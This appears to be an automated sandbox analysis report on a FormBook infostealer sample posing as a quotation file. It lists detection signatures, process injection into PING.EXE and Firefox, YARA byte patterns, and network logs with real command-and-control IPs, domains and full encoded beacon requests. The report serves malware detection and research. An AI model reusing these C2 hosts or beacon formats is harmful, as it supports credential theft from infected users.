Windows Analysis Report
Quotation-27-08-24.exe

Overview

General Information

Sample name: Quotation-27-08-24.exe
Analysis ID: 1499588
MD5: fcb6844bca1d8d2a4c41025b08a50799
SHA1: 524dd948b1f08b4f64da958439e7c0e42b542c72
SHA256: 866dc796d2727a535d138d80a3196c82dfefb4c38ac6b51f8c81ca381e035f45
Tags: exe, Quotation
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Quotation-27-08-24.exe (PID: 3880 cmdline: "C:\Users\user\Desktop\Quotation-27-08-24.exe" MD5: FCB6844BCA1D8D2A4C41025B08A50799)
    • Quotation-27-08-24.exe (PID: 4932 cmdline: "C:\Users\user\Desktop\Quotation-27-08-24.exe" MD5: FCB6844BCA1D8D2A4C41025B08A50799)
    • Quotation-27-08-24.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\Quotation-27-08-24.exe" MD5: FCB6844BCA1D8D2A4C41025B08A50799)
      • uExImirYECsTjI.exe (PID: 5700 cmdline: "C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PING.EXE (PID: 7136 cmdline: "C:\Windows\SysWOW64\PING.EXE" MD5: B3624DD758CCECF93A1226CEF252CA12)
          • firefox.exe (PID: 3884 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.Quotation-27-08-24.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.Quotation-27-08-24.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f183:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.Quotation-27-08-24.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.Quotation-27-08-24.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e383:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched

            AV Detection

            Source: Quotation-27-08-24.exe, Virustotal: Detection: 33%
            Source: Yara match, File source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Quotation-27-08-24.exe, Joe Sandbox ML: detected
            Source: Quotation-27-08-24.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Quotation-27-08-24.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uExImirYECsTjI.exe, 00000008.00000002.4568881862.0000000000F9E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Quotation-27-08-24.exe, Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdb source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 9_2_0048C010 FindFirstFileW,FindNextFileW,FindClose, 9_2_0048C010
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe, Code function: 4x nop then xor eax, eax 8_2_05818D29
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe, Code function: 4x nop then pop edi 8_2_05813820
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 4x nop then xor eax, eax 9_2_00479C70
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 4x nop then pop edi 9_2_0047DBC0
            Source: C:\Windows\SysWOW64\PING.EXE, Code function: 4x nop then mov ebx, 00000004h 9_2_02EF04DF

            Networking

            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51206 -> 119.28.49.194:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51201 -> 194.58.112.174:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51217 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51217 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51212 -> 85.159.66.93:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51223 -> 172.96.186.147:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51195 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51220 -> 194.195.220.41:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51212 -> 85.159.66.93:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51209 -> 85.159.66.93:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51205 -> 119.28.49.194:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51197 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51198 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51198 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51202 -> 194.58.112.174:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51222 -> 172.96.186.147:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51208 -> 119.28.49.194:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51227 -> 162.0.239.141:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51226 -> 162.0.239.141:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51211 -> 85.159.66.93:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51207 -> 119.28.49.194:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51208 -> 119.28.49.194:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51218 -> 194.195.220.41:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51213 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51196 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51234 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51214 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51236 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51237 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51231 -> 13.248.169.48:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51239 -> 199.59.243.226:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51215 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51193 -> 92.204.210.213:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51237 -> 84.32.84.32:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51193 -> 92.204.210.213:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51229 -> 162.0.239.141:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51247 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51229 -> 162.0.239.141:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51242 -> 199.59.243.226:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51250 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51242 -> 199.59.243.226:80
            Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51250 -> 162.240.81.18:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51240 -> 199.59.243.226:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51210 -> 85.159.66.93:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51230 -> 13.248.169.48:80
            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51248 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51246 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51245 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51246 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51224 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51243 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51235 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51219 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51241 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51251 -> 172.67.220.161:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51244 -> 157.7.44.213:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51204 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51204 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51221 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51221 -> 194.195.220.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51199 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51228 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51252 -> 172.67.220.161:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51225 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51225 -> 172.96.186.147:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:51233 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:51233 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51232 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:51249 -> 162.240.81.18:80
            Source: DNS query: www.kontorpaneli.xyz
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gate-eight.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zch2/?mvjDMBx8=aE5KdauoI4Y2umflLKCriqVYTdzyJYOxKMaFRYlB9+Sv37Nuz5MD+L3RaAAlRIcvVgOa2tpXA3nWnQsvE78wTxh4OatPeg0Yh8Bm15yxUJXRh7FOvkM1aT2MQQJBhGDX4aCwZoM=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.glitterinthegrey.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mjy7/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=cg99eHdIhH6PRmBvzzsY4n38eZmBksl3PUY+KkgGmlThXL3WC2dP6WW67TtKoTiLnNtMIhIq0So6UKQjTmNbIq3Et/8UbAXoANeZC4OXTx0MozCDv0bkromw6gd6nEy8FhxsXmw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.indeks.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cs0724sd92jj.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kontorpaneli.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.globyglen.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hup/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=dEhQ1XEV2cGux7LKlL+scgcBfO64DeKcVe19yXl7eYIZvhBzatxTyUaQx2TCVW77GzJhrYbmnII2KrJyLin2/kNdYev+ljAzma1yOM1J7qbV9Zx9z1N3S/Qs4ysm8OEw2XKCNmo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.techcables.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.adindadisini15.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kunq/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=e2pBBNKfhlcNZug/MlikLwl2FbwO8O5PulKDyYpFlUnCxZtvvcHmj1jMPp0LVU20n2VhUZuzz0qV7Mfxt0dNEDuQKyzOHg8PupeV8YN8l6deJxHpy2VUY+/g7EuAZK4kmgb6d+0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.stolex.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
